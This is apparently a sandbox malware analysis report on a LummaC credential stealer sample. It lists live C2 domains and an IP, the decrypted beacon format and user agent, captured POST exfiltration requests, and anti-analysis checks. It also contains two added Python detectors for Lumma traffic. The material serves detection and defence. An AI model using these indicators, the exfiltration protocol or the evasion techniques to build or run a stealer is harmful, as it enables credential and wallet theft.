
Windows Analysis Report
fer4JIJGeL.exe

Overview

General Information

Sample name: fer4JIJGeL.exe (renamed because the original name is a hash value)
Original sample name: 0d3b04489baa22c2f702c549466b64f4.exe
Analysis ID: 1581241
MD5: 0d3b04489baa22c2f702c549466b64f4
SHA1: 9f7abb36d9fffd4d6cb236c8e119359517691729
SHA256: 0da0539837800ea38bae7556cd5ffe4d45fb0d1135253e85801645bc7fa6cfec
Tags: exe, user-abuse_ch

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • fer4JIJGeL.exe (PID: 7656 cmdline: "C:\Users\user\Desktop\fer4JIJGeL.exe" MD5: 0D3B04489BAA22C2F702C549466B64F4)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["rebuildeso.buzz", "mindhandru.buzz", "cashfuzysao.buzz", "appliacnesot.buzz", "scentniej.buzz", "hummskitnj.buzz", "screwamusresz.buzz", "inherineau.buzz", "prisonyfork.buzz"], "Build id": "PsFKDg--pablo"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000003.1510871342.0000000001871000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.1537869604.0000000001835000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.1535594138.0000000001871000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.1535594138.0000000001835000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.1510871342.0000000001835000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
(6 further entries collapsed in the original report)
No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-27T09:00:16.122859+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49705 | 172.67.165.185 | 443 | TCP
2024-12-27T09:00:18.065792+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49706 | 172.67.165.185 | 443 | TCP
2024-12-27T09:00:20.802751+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49707 | 172.67.165.185 | 443 | TCP
2024-12-27T09:00:23.053569+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49708 | 172.67.165.185 | 443 | TCP
2024-12-27T09:00:25.371174+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49709 | 172.67.165.185 | 443 | TCP
2024-12-27T09:00:27.986135+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49710 | 172.67.165.185 | 443 | TCP
2024-12-27T09:00:31.192538+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49711 | 172.67.165.185 | 443 | TCP
2024-12-27T09:00:34.719114+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49715 | 172.67.165.185 | 443 | TCP
2024-12-27T09:00:16.843983+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.8 | 49705 | 172.67.165.185 | 443 | TCP
2024-12-27T09:00:19.055605+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.8 | 49706 | 172.67.165.185 | 443 | TCP
2024-12-27T09:00:16.843983+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.8 | 49705 | 172.67.165.185 | 443 | TCP
2024-12-27T09:00:19.055605+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.8 | 49706 | 172.67.165.185 | 443 | TCP
2024-12-27T09:00:21.686754+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49707 | 172.67.165.185 | 443 | TCP
2024-12-27T09:00:31.197541+0100 | 2843864 | 1 | A Network Trojan was detected | 192.168.2.8 | 49711 | 172.67.165.185 | 443 | TCP
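Added example (not part of the Joe Sandbox report): the Suricata alerts above, transcribed into a constructed CSV layout and correlated per flow. The fingerprint-only JA3 rule (SID 2028371, severity 3) fires on all eight TLS sessions to 172.67.165.185 and on its own is low confidence; grouping by 5-tuple shows which sessions a severity-1 Lumma content rule confirms and which four carry only the JA3 hit. Rule messages are the ones listed in the Networking section of this report; the CSV column layout and the helper names are this example's own.

```python
import csv
from collections import defaultdict
from io import StringIO

# The report's Suricata table, transcribed into a constructed CSV layout.
ALERTS_CSV = """timestamp,sid,severity,src_ip,src_port,dst_ip,dst_port,proto
2024-12-27T09:00:16.122859+0100,2028371,3,192.168.2.8,49705,172.67.165.185,443,TCP
2024-12-27T09:00:18.065792+0100,2028371,3,192.168.2.8,49706,172.67.165.185,443,TCP
2024-12-27T09:00:20.802751+0100,2028371,3,192.168.2.8,49707,172.67.165.185,443,TCP
2024-12-27T09:00:23.053569+0100,2028371,3,192.168.2.8,49708,172.67.165.185,443,TCP
2024-12-27T09:00:25.371174+0100,2028371,3,192.168.2.8,49709,172.67.165.185,443,TCP
2024-12-27T09:00:27.986135+0100,2028371,3,192.168.2.8,49710,172.67.165.185,443,TCP
2024-12-27T09:00:31.192538+0100,2028371,3,192.168.2.8,49711,172.67.165.185,443,TCP
2024-12-27T09:00:34.719114+0100,2028371,3,192.168.2.8,49715,172.67.165.185,443,TCP
2024-12-27T09:00:16.843983+0100,2054653,1,192.168.2.8,49705,172.67.165.185,443,TCP
2024-12-27T09:00:19.055605+0100,2054653,1,192.168.2.8,49706,172.67.165.185,443,TCP
2024-12-27T09:00:16.843983+0100,2049836,1,192.168.2.8,49705,172.67.165.185,443,TCP
2024-12-27T09:00:19.055605+0100,2049812,1,192.168.2.8,49706,172.67.165.185,443,TCP
2024-12-27T09:00:21.686754+0100,2048094,1,192.168.2.8,49707,172.67.165.185,443,TCP
2024-12-27T09:00:31.197541+0100,2843864,1,192.168.2.8,49711,172.67.165.185,443,TCP
"""

# Rule messages as listed in the Networking section of the report.
MESSAGES = {
    2028371: "ET JA3 Hash - Possible Malware - Fake Firefox Font Update",
    2049836: "ET MALWARE Lumma Stealer Related Activity",
    2054653: "ET MALWARE Lumma Stealer CnC Host Checkin",
    2049812: "ET MALWARE Lumma Stealer Related Activity M2",
    2048094: "ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration",
    2843864: "ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2",
}
JA3_SID = 2028371  # fingerprint-only rule: severity 3, fires on every TLS session here


def load_alerts(text: str) -> list:
    """Parse the CSV and coerce numeric columns."""
    rows = []
    for r in csv.DictReader(StringIO(text)):
        r["sid"], r["severity"] = int(r["sid"]), int(r["severity"])
        r["src_port"], r["dst_port"] = int(r["src_port"]), int(r["dst_port"])
        rows.append(r)
    return rows


def group_flows(alerts: list) -> dict:
    """Key alerts by 5-tuple; order each flow's alerts by timestamp, then SID."""
    flows = defaultdict(list)
    for a in alerts:
        flows[(a["src_ip"], a["src_port"], a["dst_ip"], a["dst_port"], a["proto"])].append(a)
    return {k: sorted(v, key=lambda a: (a["timestamp"], a["sid"])) for k, v in flows.items()}


def escalate(flows: dict) -> dict:
    """Flows where the low-confidence JA3 hit is confirmed by a severity-1 content
    rule on the same 5-tuple. Value is the SID sequence in time order."""
    return {k: [a["sid"] for a in v] for k, v in flows.items()
            if any(a["sid"] == JA3_SID for a in v) and any(a["severity"] == 1 for a in v)}


def unconfirmed(flows: dict) -> list:
    """Source ports of flows that carry only the JA3 hit: same TLS client, but no
    content signature matched. These are the sessions to carve from the pcap first."""
    return sorted(k[1] for k, v in flows.items() if all(a["sid"] == JA3_SID for a in v))


if __name__ == "__main__":
    flows = group_flows(load_alerts(ALERTS_CSV))
    for key, sids in sorted(escalate(flows).items()):
        print(f"{key[0]}:{key[1]} -> {key[2]}:{key[3]}")
        for sid in sids:
            print(f"    {sid}  {MESSAGES[sid]}")
    print("JA3-only flows (src ports):", unconfirmed(flows))
```

Run as a script it prints four confirmed flows (source ports 49705, 49706, 49707, 49711) with their ordered rule sequence, and lists 49708, 49709, 49710 and 49715 as JA3-only sessions worth pulling from the pcap by hand.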

AV Detection

Source: fer4JIJGeL.exe | Avira: detected
Source: https://mindhandru.buzz/ku | Avira URL Cloud: Label: malware
Source: https://mindhandru.buzz/4 | Avira URL Cloud: Label: malware
Source: https://mindhandru.buzz/~Z | Avira URL Cloud: Label: malware
Source: https://mindhandru.buzz/pil | Avira URL Cloud: Label: malware
Source: https://mindhandru.buzz/apisZV | Avira URL Cloud: Label: malware
Source: https://mindhandru.buzz/Win | Avira URL Cloud: Label: malware
Source: https://mindhandru.buzz/apill | Avira URL Cloud: Label: malware
Source: fer4JIJGeL.exe.7656.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["rebuildeso.buzz", "mindhandru.buzz", "cashfuzysao.buzz", "appliacnesot.buzz", "scentniej.buzz", "hummskitnj.buzz", "screwamusresz.buzz", "inherineau.buzz", "prisonyfork.buzz"], "Build id": "PsFKDg--pablo"}
Source: fer4JIJGeL.exe | ReversingLabs: Detection: 57%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: fer4JIJGeL.exe | Joe Sandbox ML: detected
Source: 00000000.00000003.1416826075.00000000053E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: hummskitnj.buzz
Source: 00000000.00000003.1416826075.00000000053E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: cashfuzysao.buzz
Source: 00000000.00000003.1416826075.00000000053E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: appliacnesot.buzz
Source: 00000000.00000003.1416826075.00000000053E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: screwamusresz.buzz
Source: 00000000.00000003.1416826075.00000000053E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: inherineau.buzz
Source: 00000000.00000003.1416826075.00000000053E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: scentniej.buzz
Source: 00000000.00000003.1416826075.00000000053E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: rebuildeso.buzz
Source: 00000000.00000003.1416826075.00000000053E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: prisonyfork.buzz
Source: 00000000.00000003.1416826075.00000000053E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: mindhandru.buzz
Source: 00000000.00000003.1416826075.00000000053E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000003.1416826075.00000000053E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000000.00000003.1416826075.00000000053E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
Source: 00000000.00000003.1416826075.00000000053E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000000.00000003.1416826075.00000000053E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: Workgroup: -
Source: 00000000.00000003.1416826075.00000000053E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: PsFKDg--pablo
Source: fer4JIJGeL.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.8:49711 version: TLS 1.2

Networking

Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49705 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49705 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:49706 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49706 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.8:49707 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.8:49711 -> 172.67.165.185:443
Source: Malware configuration extractor | URLs: rebuildeso.buzz
Source: Malware configuration extractor | URLs: mindhandru.buzz
Source: Malware configuration extractor | URLs: cashfuzysao.buzz
Source: Malware configuration extractor | URLs: appliacnesot.buzz
Source: Malware configuration extractor | URLs: scentniej.buzz
Source: Malware configuration extractor | URLs: hummskitnj.buzz
Source: Malware configuration extractor | URLs: screwamusresz.buzz
Source: Malware configuration extractor | URLs: inherineau.buzz
Source: Malware configuration extractor | URLs: prisonyfork.buzz
Source: Joe Sandbox View | IP Address: 172.67.165.185
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49706 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49709 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49708 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49705 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49710 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49707 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49711 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49715 -> 172.67.165.185:443
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: mindhandru.buzz
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 47
    Host: mindhandru.buzz
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=AVT6GUCXU
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 12792
    Host: mindhandru.buzz
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=3PQAHZZ6
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 15015
    Host: mindhandru.buzz
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=5T8PG350TZ5RDHECV6F
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 20248
    Host: mindhandru.buzz
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=LK7TWOIGHFY18V46CV8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 1241
    Host: mindhandru.buzz
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=0WACV1U001
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 551961
    Host: mindhandru.buzz
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: mindhandru.buzz
Source: unknown | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: mindhandru.buzz
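Added example (not part of the Joe Sandbox report, and not the malware's or the sandbox's code): a detector over proxy-style HTTP records that combines the indicators this report exposes. The C2 domain list comes from the extracted configuration, the body format from the decrypted string "lid=%s&j=%s&ver=4.0", the user agent from the decrypted string "TeslaBrowser/5.5", and the "screen." zipped-filename heuristic from the ETPRO 2843864 rule description. One caveat the report itself supports: on the wire this sample used a Chrome 119 user agent, not TeslaBrowser/5.5, so the UA is a weak pivot and "POST /api" alone is too generic, which is why the code requires the body shape or a known host. The record layout, the form-field values, the "screen.zip" filename and the hosts api.example.org and rotated-c2.example are constructed for the example.

```python
import re
from dataclasses import dataclass, field

# Indicators lifted from the report above; everything else here is constructed.
C2_DOMAINS = {
    "rebuildeso.buzz", "mindhandru.buzz", "cashfuzysao.buzz",
    "appliacnesot.buzz", "scentniej.buzz", "hummskitnj.buzz",
    "screwamusresz.buzz", "inherineau.buzz", "prisonyfork.buzz",
}
BEACON_BODY = re.compile(rb"^lid=[^&]+&j=[^&]+&ver=4\.0$")           # decrypted format string
TESLA_UA = "TeslaBrowser/5.5"                                          # decrypted user agent
SCREEN_UPLOAD = re.compile(rb'filename="[^"]*screen\.[^"]*"', re.I)   # ETPRO 2843864 theme
CHROME_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
             "(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36")    # UA seen on the wire


@dataclass
class HttpRecord:
    method: str
    path: str
    headers: dict
    body: bytes


@dataclass
class Verdict:
    host: str
    reasons: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def parse_record(raw: bytes) -> HttpRecord:
    """Split a raw CRLF-framed request into request line, headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line, *header_lines = head.decode("latin-1").split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")   # split on the first colon only
        headers[name.strip().lower()] = value.strip()
    return HttpRecord(method, path, headers, body)


def assess(rec: HttpRecord) -> Verdict:
    """Apply the LummaC indicators. The Chrome UA and 'POST /api' by themselves
    are deliberately not reasons: both are common in benign traffic."""
    host = rec.headers.get("host", "").lower()
    ctype = rec.headers.get("content-type", "")
    v = Verdict(host)
    if host in C2_DOMAINS:
        v.reasons.append("host in extracted LummaC config")
    if TESLA_UA in rec.headers.get("user-agent", ""):
        v.reasons.append("decrypted LummaC user agent")
    if rec.method == "POST" and rec.path == "/api":
        if ctype.startswith("application/x-www-form-urlencoded") and BEACON_BODY.match(rec.body):
            v.reasons.append("body matches lid=%s&j=%s&ver=4.0 format")
        if ctype.startswith("multipart/form-data") and SCREEN_UPLOAD.search(rec.body):
            v.reasons.append("multipart upload with screen.* filename")
    return v


def build_request(method, path, host, ctype, body: bytes, ua=CHROME_UA) -> bytes:
    """Assemble a raw request the way a proxy capture presents it (constructed)."""
    head = (f"{method} {path} HTTP/1.1\r\nConnection: Keep-Alive\r\n"
            f"Content-Type: {ctype}\r\nUser-Agent: {ua}\r\n"
            f"Content-Length: {len(body)}\r\nHost: {host}\r\n\r\n")
    return head.encode() + body


# Constructed sample traffic: form values, filename and non-.buzz hosts are made up.
MULTIPART = (b"--AVT6GUCXU\r\n"
             b'Content-Disposition: form-data; name="file"; filename="screen.zip"\r\n'
             b"Content-Type: application/zip\r\n\r\nPK\x03\x04\x00\x00\r\n--AVT6GUCXU--\r\n")
SAMPLE_RECORDS = [
    build_request("POST", "/api", "mindhandru.buzz", "application/x-www-form-urlencoded",
                  b"lid=PsFKDg--pablo&j=0123456789abcdef&ver=4.0"),
    build_request("POST", "/api", "mindhandru.buzz", "multipart/form-data; boundary=AVT6GUCXU",
                  MULTIPART),
    build_request("POST", "/api", "api.example.org", "application/json",
                  b'{"event":"heartbeat"}'),                      # benign look-alike path
    build_request("POST", "/api", "rotated-c2.example", "application/x-www-form-urlencoded",
                  b"lid=ZZZZ--test&j=ffffffff&ver=4.0"),          # new domain, same protocol
]


def scan(raw_records) -> list:
    """Parse and assess every record; one Verdict per record, in input order."""
    return [assess(parse_record(r)) for r in raw_records]


if __name__ == "__main__":
    for v in scan(SAMPLE_RECORDS):
        print(f"{v.host:<20} {'ALERT' if v.suspicious else 'ok':<6} {'; '.join(v.reasons)}")
```

The fourth record is the point of the body-shape check: a domain not in this sample's configuration still trips the detector, so the rule survives the C2 rotation that a pure domain blocklist does not. Feed it records from your own proxy or Zeek export by replacing SAMPLE_RECORDS with raw request bytes.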
Source: fer4JIJGeL.exe, 00000000.00000003.1511113401.0000000006014000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: fer4JIJGeL.exe, 00000000.00000003.1511113401.0000000006014000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: fer4JIJGeL.exe, 00000000.00000003.1537765553.0000000001871000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1569973357.0000000001871000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1510871342.0000000001871000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1535594138.0000000001871000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1538148540.0000000001871000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1608248734.000000000187E000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1464466166.0000000001871000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro8
Source: fer4JIJGeL.exe, 00000000.00000003.1511113401.0000000006014000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: fer4JIJGeL.exe, 00000000.00000003.1511113401.0000000006014000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: fer4JIJGeL.exe, 00000000.00000003.1511113401.0000000006014000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: fer4JIJGeL.exe, 00000000.00000003.1511113401.0000000006014000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: fer4JIJGeL.exe, 00000000.00000003.1511113401.0000000006014000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: fer4JIJGeL.exe, 00000000.00000003.1511113401.0000000006014000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: fer4JIJGeL.exe, 00000000.00000003.1511113401.0000000006014000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: fer4JIJGeL.exe, 00000000.00000003.1511113401.0000000006014000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: fer4JIJGeL.exe, 00000000.00000003.1511113401.0000000006014000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: fer4JIJGeL.exe, 00000000.00000003.1465358750.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465500291.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465424397.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: fer4JIJGeL.exe, 00000000.00000003.1512405754.0000000005FF0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
Source: fer4JIJGeL.exe, 00000000.00000003.1512405754.0000000005FF0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
Source: fer4JIJGeL.exe, 00000000.00000003.1465358750.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465500291.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465424397.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: fer4JIJGeL.exe, 00000000.00000003.1465358750.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465500291.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465424397.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
